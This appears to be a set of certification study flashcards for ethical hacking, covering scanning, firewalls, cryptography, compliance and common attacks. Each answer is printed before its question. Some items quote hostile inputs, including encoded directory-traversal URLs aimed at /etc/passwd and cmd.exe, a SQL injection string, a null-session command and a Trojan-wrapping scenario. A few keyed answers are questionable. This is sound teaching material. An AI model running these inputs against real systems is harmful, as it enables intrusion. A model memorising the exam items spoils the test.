Which of the following tools is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software? A)Cygwin B)ChewBacca C)CyberGate D)g++ E)SwayzCryptor

C)Routers

Which of the following use a rule-based access model? A)NTFS permissions B)US military C)Routers D)Hubs

C)SHA 1

Which of the following uses 160 bits for hashing? A)MD5 B)SHA 2 C)SHA 1 D)SHA 3

C)iptables

Which of the following versions of the Linux firewall is required for Linux kernel versions 2.4x and above? A)NPF B)ipfwadm C)iptables D)ipchains

D. PCI DSS (Payment Card Industry Data Security Standard)

Which of the following was created to protect credit card data at rest and in transit in an effort to reduce fraud? A. TCSEC B. Common Criteria C. ISO 27002 D. PCI DSS

C. SOX (Sarbanes-Oxley Act)

Which of the following was created to protect shareholders and the general public from corporate accounting errors and fraudulent practices, and to improve the accuracy of corporate disclosures? A. GLBA B. HIPAA C. SOX D. FITARA

C)Mantrap

Which of the following would be an appropriate mitigation for tailgating? A)Redundancy B)Account lockout policy C)Mantrap D)iptables

C. Netcraft

Which of the following would be the best choice for footprinting restricted URLs and OS information from a target? A. www.archive.org B. www.alexa.com C. Netcraft D. Yesware

C. A guard posted outside the door

Which of the following would be the best example of a deterrent control? A. A log aggregation system B. Hidden cameras onsite C. A guard posted outside the door D. Backup recovery systems

A)The same key is used to encrypt and decrypt data.

Which one of the following statements best describes symmetric encryption? A)The same key is used to encrypt and decrypt data. B)Data is hashed and signed by a digital signature issued from a trusted third-party. C)One private key is used to encrypt and another public key is used to decrypt data. D)Data is concealed in ignored sections of files.

A)CSIRT

Which organization provides an incident response service to act as a reliable and trusted single point of contact for reporting computer security incidents worldwide? A)CSIRT B)GSI C)NIST D)OWASP

Tailgating

Which physical security issues is mitigated by a mantrap?

A)80

Which port is the most likely to be open on a web server? A)80 B)23 C)25 D)3389

D)80

Which port number is used by the HTTPTunnel tool to bypass a firewall? A)666 B)22 C)3389 D)80

C. TCP 53

Which protocol and port number combination is used by default for DNS zone transfers? A. UDP 53 B. UDP 161 C. TCP 53 D. TCP 22

B)ICMP C)UDP

Which protocols are used by default when executing a traceroute in UNIX/Linux and Windows? (Choose all that apply.) A)RTP B)ICMP C)UDP D)TCP

VoIP enumeration

___ provide sensitsive information such as VoIP gateway/servers, IP-PBX systems, client software (softwphones)/VoIP phones User-agent IP addresses and user extensions

C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link.

Which scenario demonstrates a phishing attack? A)The attacker attempts to gain confidential information, especially login credentials, by looking over an authorized user's shoulder. B)A program writes data to a buffer until it overruns the buffer's boundary and overwrites adjacent memory locations. C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link. D)The attacker attempts to steal passwords through an innocent looking application.

File permissions

Which security control can prevent data access by a hacker interacting and modifying HTML on a web server?

Controlling the use of USB ports

Which security policy will mitigate the copying of sensitive data to a USB drive?

D)Wassenaar Arrangement

Which standard provides guidelines for the responsible and open transfer of conventional arms and sensitive or dual-use military resources? A)ISO 2700 B)Rainbow Books C)Common Criteria D)Wassenaar Arrangement

Trusted Computer System Evaluation Criteria (TCSEC)

Which standard uses divisions called security assurance levels to evaluate products?

Information Technology Security Evacuation Criteria (ITSEC)

Which standard uses levels called security functional requirements to access security functionality?

D)Restore systems to normal service operation as quickly as possible

Which statement best describes the purpose of incident management? A)Log all incidents that take place in an organization B)Trigger alerts to prevent potential risks and threats C)Analyze vulnerabilities as quickly as possible D)Restore systems to normal service operation as quickly as possible

Session hijacking is an attack that aims at stealing a legitimate session and posing as that user while communicating with the web reousrece

Which statement defines session hijacking most accurately?

B)Static NAT uses a one-to-many mapping

Which statement is FALSE with regard to network address translation (NAT)? A)Dynamic NAT uses a many-to-many mapping B)Static NAT uses a one-to-many mapping C)Static NAT uses a one-to-one mapping D)PAT uses a many-to-one mapping

B)SSL operates above the Transport layer.

Which statement is true about SSL? A)SSL is protected against CBC attacks. B)SSL operates above the Transport layer. C)SSL is an active encryption standard. D)SSL encrypts each message independently.

A)GAK

Which term refers to the statutory obligation of companies to disclose their cryptographic keys to government agencies? A)GAK B)TPM C)key escrow D)PKI

B)Protection profiles C)Evaluation assurance levels

Which two of the following are key components of the Common Criteria evaluation system? A)Security functional requirements B)Protection profiles C)Evaluation assurance levels D)Security assurance levels

Phlashing

Which type of DDoS attack can damage actual networking hardware?

SYN flooding

Which type of DDoS attack takes advantage of the TCP three way handshake to overwhelm the victims listening que?

B)Polymorphic shellcode

Which type of IDS evasion technique hides commonly used strings with encoding and uses a stub to decode and execute differently each time? A)ASCII shellcode B)Polymorphic shellcode C)Packet fragmentation D)Overlapping fragments

Dynamic NAT

Which type of NAT uses a many-to-many mapping model?

Port Address Translation (PAT)

Which type of NAT uses a one-to-many mapping model?

Static NAT

Which type of NAT uses a one-to-one mapping model?

B)Rule-based access control

Which type of access control is supported by standard routers? A)Role-based access control B)Rule-based access control C)Mandatory access control D)Discretionary access control

MAC flood attacks

Which type of attack can be prevented by using port security to create static ARP entries in the MAC table?

SYN flood

Which type of attack exploits the TCP handshake process?

B. White box

Which type of attack is generally conducted as an inside attacker with elevated privileges on the resources? A. Gray box B. White box C. Black box D. Active reconnaissance

MAC flood attack

Which type of attack sends many frames with bogus MAC addresses as the source?

Session fragmentation

Which type of attack splits the attack payload into many packet fragments?

Switches

Which type of device is targeted by MAC flood attacks?

C) Hardware

Which type of keylogger cannot be detected by antivirus software? A) Stealth B) Heuristic C) Hardware D) Software

Brute force

Which type of password attack attempts every combination of characters?

White box

Which type of penetration test requires the test to have complete knowledge of the target system(s)?

Black box

Which type of penetration test requires the test to have no knowledge of the target system(s)?

Gray box

Which type of penetration test requires the tester to have only limited knowledge of the target system(s)

A) FIN

Which type of port scan sets only the flag that brings TCP conversations to an orderly close? A) FIN B) RST C) IDLE D) XMAS

B)WPA2

Which wireless encryption mechanism uses AES? A)WEP B)WPA2 C)WPA D)LEAP

Hactivism

Which word refers to hacking for a specific cause?

SNMP

___ was designed to manage IP-enabled devices across a network.

C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network

While implementing a demilitarized zone (DMZ) to protect several network resources, your company decides to implement a bastion host. What is the BEST description of this device? A)Component that restricts access between an internal network and the Internet or between other sets of networks B)Resource, usually located on the DMZ, that pretends to be a real target, but is really an isolated resource where the attacker cannot do any real damage C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network D)System fitted with two network interfaces that sits between a public, untrusted network and an internal network to provide secure access

B)Tails

While researching specific security issues for your company, you want to use an anonymizer to ensure that your privacy is protected. Which of the following is NOT an anonymizer? A)TOR B)Tails C)Psiphon D)Proxify

text viewers

Whitespace Steganography Because spaces and tabs are generally not visible in ___, therefore the message is effectively hidden from casual observers

SNOW

Whitespace Steganography Use ___ tool to hide the message

built-in encryption

Whitespace Steganography Use of ___ makes the message unreadable even if it is detected

-To hide the source IP address so that they can hack without any legal corollary -To mask the actual source of the attack by impersonating a fake source address of the proxy -To remotely access intranets and other website resources that are normally off limits -To interrupt all the requests sent by a user and transmit them to a third destination, hence victims will only be able to identify the proxy server address -Attackers chain multiple proxy servers to avoid detection

Why attackers use proxy servers?

Privacy and anonymity Protects from online attacks Access restricted content Bypass IDS and Firewall rules

Why use Anonymizer?

To hide malicious file content within a benign file

Why would a hacker utilize alternate data streams (ADS)?

D)Evade detection by the IDS

Why would an attacker work very slowly when performing a ping scan of the network? A)Reduce the network traffic B)Ensure all machines are scanned C)Give the targets more time to respond D)Evade detection by the IDS

determine the security context

Windows operating system uses access tokens to ___ of a process or thread

802.11

Wireless LAN standards created by IEEE

Hub

Wireless access points function as a ____.

A. When the primary SOA record serial number is higher than the secondary's

Within the DNS system, a primary server (SOA) holds and maintains all records for the zone. Secondary servers will periodically ask the primary if there have been any updates, and if updates have occurred, they will ask for a zone transfer to update their own copies. Under what conditions will the secondary name server request a zone transfer from a primary? A. When the primary SOA record serial number is higher than the secondary's B. When the secondary SOA record serial number is higher than the primary's C. Only when the secondary reboots or restarts services D. Only when manually prompted to do so

Motive

____ originates out of the notion that the target system stores or processes something valuable and this leads to threat of an attack on the system

D)On Linux/Unix machines, there is no response.

You are a network security analyst for your company. You perform the following scan from a remote machine: nmap -sX 141.8.225.72 You use WireShark to capture the response packets. How do you determine which ports are open? A)On Windows machines, there is no response. B)On all machines, there is SYN/ACK response. C)On all machines, there is RST response. D)On Linux/Unix machines, there is no response.

B)Block all traffic over port 110.

You are a security administrator working in Chicago. The Chicago office currently has a policy in place that users should not read personal email on corporate devices. However, you have recently noticed a lot of POP3 traffic over your network even though your company's email service uses SMTP and IMAP. The office manager requests that you block POP3 traffic at the firewall. What should you do? A)Block all traffic over port 25. B)Block all traffic over port 110. C)Block incoming traffic over port 110. D)Block incoming traffic over port 25.

D)Using a mobile app to gain access to internal networks

You are a security analyst evaluating possible threats using Blackberry mobile devices. Which best describes a blackjacking attack? A)Using a mobile app to gain access to the Blackberry Enterprise Server (BES) B)Using the Blackberry Enterprise Server (BES) to limit the rights of mobile apps C)Using the Blackberry Enterprise Server (BES) to block mobile app installation D)Using a mobile app to gain access to internal networks

C)Restore from local backup media

You are a security analyst hired by a company to determine their possible response strategies to various cloud computing threats. You determine that their current cloud provider is vulnerable to SQL injection attacks. Their current versions of virtual OSes are also prone to kernel-level rootkits. If an attacker exploits both of these vulnerabilities, which response strategy would you recommend they use to sanitize an affected virtual machine? A)Roll back to the latest cloud storage snapshot B)Copy and replace key system files from an unaffected virtual machine C)Restore from local backup media D)Run a virus scan to quarantine and delete any detected files

A) The port is open

You are performing a FIN scan and get no response from a port. What does this indicate? A) The port is open B) The port is closed C) The scan has failed to reach the target D) None of the above

C)Limit the frequency of manual installations in patch management plan

You are a security consultant for a large retail chain. You have been asked to help the company establish the appropriate procedures to ensure that they comply with the PCI-DSS standard. Which of the following guidelines is NOT required for compliance? A)Restrict physical access to cardholder data B)Assign a unique ID to each person with computer access C)Limit the frequency of manual installations in patch management plan D)Install and maintain a firewall configuration to protect cardholder data

A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report.

You are an ethical hacker. You recently gained consent from an online healthcare service company to begin a series of penetration tests. These tests should only be performed during off-peak hours on Saturday and Sunday, so as not to greatly affect existing patients. You identify a SQL injection vulnerability in the account logon form. Which of the following actions would most likely NOT violate your professional code of conduct? A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report. B)Perform a WAITFOR DELAY blind SQL injection attack, and run an endless loop to stall database services. C)Perform a standard SQL injection attack, and retrieve patient records to attach to the audit report. D)Perform a standard SQL injection attack, and drop all tables required for appointment information.

A) APNIC

You are asked to test a client headquartered in Japan. Which regional registry should you begin competitive intelligence research with? A) APNIC B) RIPE C) ASIANIC D) ARIN E) LACNIC

A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ...

You are attempting to find out the operating system and CPU type of systems in your target organization. The DNS server you wish to use for lookup is named ADNS_Server, and the target machine you want the information on is ATARGET_SYSTEM. Which of the following nslookup command series is the best choice for discovering this information? (The output of the commands is redacted.) A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ... B. > server ATARGET_SYSTEM ... > set type=HINFO > ADNS_SERVER ... C. > server ADNS_SERVER ... > set ATARGET_SYSTEM > type=HINFO ... D. > server type=HINFO ... > set ADNS_SERVER > ATARGET_SYSTEM ...

D)23

You are concerned about an employee's use of Telnet when connecting to routers and switches to administer these devices. You would like to perform a port scan on all of these devices to identify any that are still enabled for Telnet. Which open port number(s) are you looking for in the results? A)80 B)21 C)135 to 139 D)23

D)Black box

You are concerned about external hackers gaining control of a new web application. With that threat actor in mind, which of the following tests would be appropriate? A)White box B)Gray box C)Clear box D)Black box

http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd

You are concerned that your Web server could be attacked with an obstructed URL. You want to configure a rule on the IDS to alert you when a strange Unicode request occurs. Which of the following is an example of a strange Unicode request? A)GET /scripts/..%255c../windows/system32/cmd.exe?/c+dir HTTP/1.1 200 B)GET /cgi- bin/cvslog.cgi=<SCRIPT>management.alert</SCRIPT> HTTP/1.1 403 C)GET /AAAAAAAAAAAAAAAAAAAA\ x90\x90\x90\x83\xec\x27\xeb\x0c\xe7\xe1\xe6\xc1\xc0\xff 500 D)http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd

D)permit 220.60.6.6 192.168.5.62/29 RDP 3389

You are configuring a firewall to allow the CTO to connect remotely to a number of workstations located in the corporate network. The CTO will use his company-issued notebook with a remote IP address of 220.60.6.6. The corporate network contains hosts in the 192.168.5.62/29 range. Which firewall rule should be added to allow the required RDP connections? A)permit 192.168.5.56/29 220.60.6.6 RDP 3389 B)permit 220.60.6.6 192.168.5.0/29 RDP 3389 C)permit 220.60.6.6 192.168.5.62/29 RDP 443 D)permit 220.60.6.6 192.168.5.62/29 RDP 3389

B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network.

You are configuring your corporate firewall. You must prevent anyone from outside the network from using traceroute to gather information about your network while still allowing the use of the tool within the network. Which actions can you take? (Choose all that apply.) A)Add a rule to allow ICMP Fragmentation-DF-Set messages to leave the network, but not to enter it. B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. C)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only leave the network, not to enter it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network. F)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from outside the network.

A)Triple-homed bastion host

You are consulting with a company on how best to implement a firewall architecture to meet their needs. The company is a cloud service provider that must allow access to virtual machines and other virtual services while denying access to development and other internal services. Only paying customers and their clients should be allowed access to virtual services. The company requires the highest security solution to optimize availability to their paying customers. Which boundary protection appliance should you recommend they include to meet their requirements? A)Triple-homed bastion host B)High-interaction honeypot C)Dual-homed bastion host D)Low-interaction honeypot

B)Bottom-of-Stack D)Label E)Time-to-Live F)Traffic Class

You are describing to a team member how multiprotocol label switching (MPLS) is implemented to handle VPN traffic across the Internet. MPLS prefixes label stack entries to each network packet. Which fields comprise a label stack entry? (Choose all that apply.) A)Checksum B)Bottom-of-Stack C)Destination Port D)Label E)Time-to-Live F)Traffic Class G)Offset H)Source Port

C)Negligence and liability

You are engaging a penetration testing provider to identify possible vulnerabilities within your organization. You are about to sign the confidentially agreement and non-disclosure agreement (NDA). What should you verify in the legal language before signing them? A)Checklist of testing requirements B)Rules of engagement C)Negligence and liability D)Fees and project schedule

A. Public (read-only) and Private (read/write)

You are enumerating a subnet. While examining message traffic, you discover SNMP is enabled on multiple targets. If you assume default settings in setting up enumeration tools to use SNMP, which community strings should you use? A. Public (read-only) and Private (read/write) B. Private (read-only) and Public (read/write) C. Read (read-only) and Write (read/write) D. Default (both read and read/write)

D. 52.93.31.255

You are examining a host with an IP address of 52.93.24.42/20 and want to determine the broadcast address for the subnet. Which of the following is the correct broadcast address for the subnet? A. 52.93.24.255 B. 52.93.0.255 C. 52.93.32.255 D. 52.93.31.255 E. 52.93.255.255

A. The host will be attempting to retrieve an HTML file. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.

You are examining a packet capture of all traffic from a host on the subnet. The host sends a segment with the SYN flag set in order to set up a TCP communications channel. The destination port is 80, and the sequence number is set to 10. Which of the following statements are not true regarding this communications channel? (Choose all that apply.) A. The host will be attempting to retrieve an HTML file. B. The source port field on this packet can be any number between 1024 and 65535. C. The first packet from the destination in response to this host will have the SYN and ACK flags set. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.

A) The password policy for the machine is weak

You are examining captured LM hash passwords. Several of the passwords hashes in the file end in "1404EE". Which of the following is true? A) The password policy for the machine is weak B) The password policy for this machine is strong C) The hashes have been salted D) The same password has been used for many accounts

C) Establish a null session for 210.55.44.66

You are examining log files and come across this command line entry: net use \210.55.44.66\IPC$ ""/u:"" What is this attempting to do? A) Create a listening port on 210.55.44.66 B) Perform a denial of service attack on 210.55.44.66 C) Establish a null session for 210.55.44.66 D) Connect to a Linux machine

D. A firewall is prohibiting connection.

You are examining traffic and notice an ICMP Type 3, Code 13 response. What does this normally indicate? A. The network is unreachable. B. The host is unknown. C. Congestion control is enacted for traffic to this host. D. A firewall is prohibiting connection.

B. It appears to be part of an XMAS scan. D. It appears port 4083 is closed.

You are examining traffic between hosts and note the following exhange: Source Prot Port Flag Destination 192.168.5.12 TCP 4082 FIN/URG/PSH 192.168.5.50 192.168.5.12 TCP 4083 FIN/URG/PSH 192.168.5.50 192.168.5.12 TCP 4084 FIN/URG/PSH 192.168.5.50 192.168.5.50 TCP 4083 RST/ACK 192.168.5.12 192.168.5.12 TCP 4085 FIN/URG/PSH 192.168.5.50 Which of the following statements are true regarding this traffic? (Choose all that apply.) A. It appears to be part of an ACK scan. B. It appears to be part of an XMAS scan. C. It appears port 4083 is open. D. It appears port 4083 is closed.

A)0x0182bd0bd4444bf836077a718ccdf409

You are hardening the CEO's laptop against boot sector viruses by setting the MBR to read-only and enabling password protection in the system BIOS. The BIOS uses a hashing algorithm similar to LAN Manager to generate a checksum that is stored on the FlashROM. Based on the following checksums, which password is the most secure? A)0x0182bd0bd4444bf836077a718ccdf409 B)0x0182bd0bd4444bf8aad3b435b51404ee C)0xaebd4de384c7ec43aad3b435b51404ee D)0x44efce164ab921caaad3b435b51404ee

D)Perform a risk assessment

You are heading a committee that is responsible for creating your company's security policies. What should you do FIRST? A)Train and educate users about security awareness B)Develop the new security policies based on company needs C)Collect standard guidelines to help guide the committee D)Perform a risk assessment

B)echo bad stuff > good.txt:shh

You are identifying system vulnerabilities on a NTFS system. Which of the following command-line statements is an example of alternate data streams (ADS)? A)type bad stuff < good.txt;shh B)echo bad stuff > good.txt:shh C)echo bad stuff > good.txt;shh D)type bad stuff < good.txt:shh

D)Integrity

You are implementing MD5 hashing for all read-only files on critical company servers. If any files are tampered with, then the MD5 hash value will not match. Which element of information security does MD5 hashing provide? A)Confidentiality B)Availability C)Non-repudiation D)Integrity

A)Filter user input with client-side validation and use parameter placeholders.

You are investigating a Perl script that contains the following code: my $user = $q -> param('username'); my $pwd = $q -> param('password'); my $sth = $dbh -> prepare("SELECT authcode FROM customers WHERE uname = '$user' & pwd = '$pwd'"); $sth->execute(); Which modification(s), if any, should you make to prevent SQL injection attacks? A)Filter user input with client-side validation and use parameter placeholders. B)Add robust error handling for user input and provide detailed client-side messages. C)Encrypt all user input on the client-side and tables and columns in the database. D)No modification is necessary.

B)Bind the compilation file (.exe) to winlogon.exe

You are learning to create Trojans by using wrapper tools. You write the following endless loop: #include <iostream> using namespace std; int main( ) { bool done = false; while (!done) { cerr << "Warning, Warning--Trojan running--Warning! Warning!" << endl; } } How would you use a wrapper tool to hide this malware inside of the legitimate Windows executable winlogon.exe? A)Bind the library file (.lib) to winlogon.exe B)Bind the compilation file (.exe) to winlogon.exe C)Bind the declaration file (.h) to winlogon.exe D)Bind the implementation file (.cpp) to winlogon.exe

B. allintitle:CEH V9

You are looking for pages with the terms CEH and V9 in their title. Which Google hack is the appropriate one? A. inurl:CEHinurl:V9 B. allintitle:CEH V9 C. intitle:CEHinurl:V9 D. allinurl:CEH V9

A. intitle:intranet inurl:intranet+intext:"human resources"

You are looking information on an organization and would like to see what human resources information may be available publicly. Which of the following Google searches look for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the web page? A. intitle:intranet inurl:intranet+intext:"human resources" B. site:"human resources"+intext:intranet C. cache:"human resources"site:sharepoint+inurl:intranet D. related:human resources inurl:intranet

D) The firewall for the DMZ subnet is not performing stateful inspection

You are performing an ACK scan against a network form an external location. You've identified two web servers on the DMZ subnet and notice that they are responding to the ACK scan. Which of the following best describes the situation? A) They are both IIS servers B) They are both Apache servers C) The IDS is not functioning for the DMZ subnet D) The firewall for the DMZ subnet is not performing stateful inspection

C. Stateful

You are performing an ACK scan against a target subnet. You previously verified connectivity to several hosts within the subnet but want to verify all live hosts on the subnet. Your scan, however, is not receiving any replies. Which type of firewall is most likely in use at your location? A. Packet filtering B. IPS C. Stateful D. Active

D)192.168.1.65-126

You are performing an internal scan of a private subnet with the following command: hping3 -1 192.168.1.127 All hosts are configured with the subnet mask 255.255.255.192. Which IP address or range of addresses will be scanned as a result of running this command? A)192.168.1.127 B)192.168.1-254 C)192.168.1.1-126 D)192.168.1.65-126

A. The response indicates an open port.

You are port scanning a system and begin sending TCP packets with the ACK flag set. Examining the return packets, you see a return packet for one port has the RST flag set and the TTL is less than 64. Which of the following is true? A. The response indicates an open port. B. The response indicates a closed port. C. The response indicates a Windows machine with a non-standard TCP/IP stack. D. ICMP is filtered on the machine.

C)Security assessment F)Incident response G)Security training

You are presenting a proposal to the company CEO on engaging Foundstone for IT security services. Which of the following solution(s) does Foundstone provide? (Choose all that apply.) A)Cyberinsurance B)Business continuity planning C)Security assessment D)Grayhat hacking E)Cloud storage security F)Incident response G)Security training

C)The system was compromised.

You are responsible for reviewing the event logs for several servers. Auditing is enabled on all the computers. Recently during a review, you noticed that there is a four-hour gap in the events contained in the security event log for one server. The security event log contains events before and after the four-hour gap. You check the other logs on the same server and do not notice any time gaps. What is most likely the reason for this time gap in the security event log? A)The system was not running. B)The security event log was full. C)The system was compromised. D)Auditing was disabled on the system.

B)Store all tapes in a secured location on site

You are reviewing a company's backup and recovery procedures. Which of the following practices will increase the likelihood of failure during tape recovery? A)Restore backups on a regular basis B)Store all tapes in a secured location on site C)Rotate backups across multiple tapes D)Perform read-after-write and full verification

D) SNMP walk

You are reviewing log files and results from a day of penetration testing. Examine this small section of scan results: ... System.sysUpTime.0:vTimesticks:(136589017) 13 days, 14:47:30 System.sysContact.0: DISPLAY STRING- (ascii) : System.sysName.0: DISPLAY STRING0 (ascii): Router 1 System.sysLocation.0: DISPLAY STRING- (ascii): ... Which scan or attack was used to generate this output? A) Nmap XMAS scan B) Hping session hijack attempt C) Firewalk D) SNMP walk

A)Change to extractedDataLength >= 65536

You are reviewing source code for any buffer overflow vulnerabilities. The following C++ source code handles data extracted from a compressed file: if (extractedDataLength < 65536) { //Break down data into multiple chunks } else { //Handle data in one large chunk } The data should be broken down into multiple chunks only when the buffer of 65,536 characters is reached or exceeded. How should you modify the condition in the first line of the code? A)Change to extractedDataLength >= 65536 B)Change to extractedDataLength == 65536 C)Change to extractedDataLength <= 65536 D)Change to extractedDataLength > 65536

D)SQL injection

You are reviewing the log files for your company's primary Web server. You notice that there are several instances where the following request is made: SELECT login_id, full_name FROM customers Which attack type could this represent? A)Buffer overflow B)Cross-site scripting C)Cross-site request forgery D)SQL injection

D)-sC

You are running a high-level vulnerability scan using the Nmap utility. The network systems include Windows machines running Internet Information Service (IIS). Which switch should you use to automate and customize vulnerability scanning for different Windows OS and SSL vulnerabilities? A)-sU B)--webxml C)-sO D)-sC

A)There is no stateful firewall installed on the DMZ perimeter.

You are scanning a company's DMZ perimeter using Nmap: sudo nmap -sA 62.77.0.1 Starting Nmap 6.49 ( https://nmap.org ) at 2016-05-09 17:00 EDT Nmap scan report for 62.77.0.1 Host is up (0.013s latency). All 1000 scanned ports on 62.77.0.1 are unfiltered MAC Address: 28:C6:8E:79:4D:22 (Netgear,) Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds Which of the following statements is true of the Nmap results? A)There is no stateful firewall installed on the DMZ perimeter. B)There is a stateful firewall installed on the DMZ perimeter. C)All ports are closed on the DMZ firewall. D)All ports are open on the DMZ firewall.

D. Use HTTP tunneling.

You are separated from your target subnet by a firewall. The firewall is correctly configured and allows requests only to ports opened by the administrator. In firewalking the device, you find that port 80 is open. Which technique could you employ to send data and commands to or from the target system? A. Encrypt the data to hide it from the firewall. B. Use session splicing. C. Use MAC flooding. D. Use HTTP tunneling.

E. CNAME

You are setting up DNS for your enterprise. Server A is both a web server and an FTP server. You want to advertise both services for this machine as name references your customers can use. Which DNS record type would you use to accomplish this? A. NS B. SOA C. MX D. PTR E. CNAME

B)SQL injection

You are testing a web application for a travel service. The web application uses a back-end database to store customer accounts and itineraries. You enter the following username value into the customer registration form: ' or 1=1 -- Which type of attack are you attempting? A)XXS B)SQL injection C)SYN Flood D)CSRF

Network Tools Pro

_____ assists in troubleshooting, diagnosing, monitoring and discovering devices on the network

D)Enforce the company security policy.

You are the security administrator for your company. You write security policies and conduct assessments to protect the company's network. An IT technician reports that he has discovered an unauthorized wireless access point attached to the company network. An employee has used the wireless access point to connect several of his personal devices to the network. Employees are not allowed to connect any personal devices to the network without prior consent from their supervisor and the IT department head. The employee explains that he used the wireless access point because he needed company data on his personal devices. What should you do? A)Configure the firewall to prevent such incidents in the future. B)Allow the devices to remain attached because the reason is sound. C)Configure the IDS to prevent such incidents in the future. D)Enforce the company security policy.

C)Network sniffer

You are thinking like a potential attacker. MAC flooding can compromise the security of your network switches. Once the attack is successful, the attacker could capture sensitive data being transmitted between other computers. Which other tool would an attacker need to complete this objective? A)Password cracker B)Vulnerability scanner C)Network sniffer D)Port scanner

A)yes

You are using NetCat to send TCP messages between two Linux hosts. Both hosts should keep sending data until the either host terminates the session. Which Linux command should you pipe to NetCat? A)yes B)echo C)wait D)tar

B)Layer 2 broadcast frame

You are using a sniffer and you see a frame with a destination address of 0xFFFFFFFFFFFF. What type of frame is this? A)Layer 3 broadcast address B)Layer 2 broadcast frame C)Layer 3 network ID D)Layer 2 network ID

C)The host decrements the TTL value by one and forwards the packet to the next host.

You are using traceroute to map the route a packets travel over a network. Which of the following statements is true when using this tool? A)The host decrements the TTL value by one and returns the packet to the previous host. B)The host increments the TTL value by one and forwards the packet to the next host. C)The host decrements the TTL value by one and forwards the packet to the next host. D)The host increments the TTL value by one and returns the packet to the previous host.

B)Incident response is part of incident handling, and incident handling is part of incident management.

You are working with another security professional to design your company's incident response procedures. Which of the following statements is true? A)Incident management is part of incident response, and incident response is part of incident handling. B)Incident response is part of incident handling, and incident handling is part of incident management. C)Incident handling is part of incident response, and incident response is part of incident management. D)Incident response is part of incident management, and incident management is part of incident handling.

C)With the POST method and HTTPS (TLS)

You are working with the web site of an online university. The admissions department requires Social Security numbers (SSN) as personally identifiable information (PII) to associate students with their financial aid packages. The student's SSN should not be available to man-in-the-middle attacks. How should the SSNs be sent to the web server? A)With the GET method and HTTPS (SSL) B)With the POST method and HTTP C)With the POST method and HTTPS (TLS) D)With the GET method and HTTP

C)Healthcare records

You are your company's security administrator. Your company has recently opened a new division. The division head explains to you the Privacy Rule for HIPAA. Which type of record is affected by this? A)Employee records B)Credit card records C)Healthcare records D)Financial records

company's infrastructure details

You can gather ____ from job postings

B)Acknowledgement of a data packet

You capture the following TCP frames using Wireshark: 343 61.586595 208.44.193.36 192.168.1.3 TCP (TCP segment of a reassembled PDU] 344 61.590149 192.168.1.3 208.44.193.36 TCP 3202 > http [FIN, ACK] Seq=986 Ack=25462 Win=17520 Len=0 345 61.590208 208.44.193.36 192.168.1.3 HTTP HTTP/1.1 404 Not Found (text/html) 346 61.590264 192.168.1.3 208.44.193.36 TCP 3203 > http [RST, ACK] Seq=987 Ack=25797 Win=0 Len=0 347 66.229719 192.168.1.3 208.44.193.36 TCP 3206 > http [SYN] Seq=0 Len=0 MSS=1460 348 66.369449 208.44.193.36 192.168.1.3 TCP http > 3206 [SYN, ACK] Seq=O Ack=1 Win=l460 Len=0 MSS=l460 349 66.369526 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=1 Ack=1 Win=17520 Len=0 350 66.369745 192.168.1.3 208.44.193.36 HTTP GET /images/product-images/practicetest/Image:cert-312-50.png HTTP/1.1 351 66.736536 208.44.193.36 192.168.1.3 TCP http > 3206 [ACK] Seq=1 Ack=625 Win=63616 Len=0 352 66.913117 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 353 66.927650 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 354 66.927706 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=625 Ack=2025 Win=17520 Len=0 355 66.948746 192.168.1.3 208.44.193.36 TCP 3207 > http [SYN] Seq=0 Len=0 MSS=1460 356 67.145268 208.44.193.36 192.168.1.3 TCP [TCP Previous segment lost] [TCP Segment of a reassembled PDU] What is the purpose of frame 354? A)Final acknowledgement in a TCP handshake B)Acknowledgement of a data packet C)First step in the TCP handshake D)Second step in the TCP handshake

B)126.123.64.0/19

You detect an attempted ICMP echo scan using the broadcast address 126.123.95.255. You need to determine which network devices were potential targets. Which subnet was likely targeted by the scan? A)126.123.64.0/17 B)126.123.64.0/19 C)126.123.64.0/18 D)126.123.64.0/20

D)Sniffs NFS traffic on the network

You discover that an attacker has used filesnarf to attack your network. Which of the following best describes what this tool does? A)Discovers hosts and services on a computer network. B)Automates the import of log data from over 200 common network devices C)Floods a switched LAN with random MAC addresses D)Sniffs NFS traffic on the network

Unable to connect to the Internet, but able to connect to other wireless stations

You have 25 computers connected to a wireless access point that is providing an IP address in the 192.168.5.0/24 network and a default gateway address 192.168.5.1/24 to the clients. If the default gateway is not routing traffic sent to the gateway to a public IP address, how will clients be affected? A)Unable to connect to the Internet or to other wireless stations B)Able to connect to the Internet and to other wireless stations C)Able to connect to the Internet, but unable to connect to other wireless stations D)Unable to connect to the Internet, but able to connect to other wireless stations

A. ip.addr==192.168.22.5 && tcp contains HR_admin

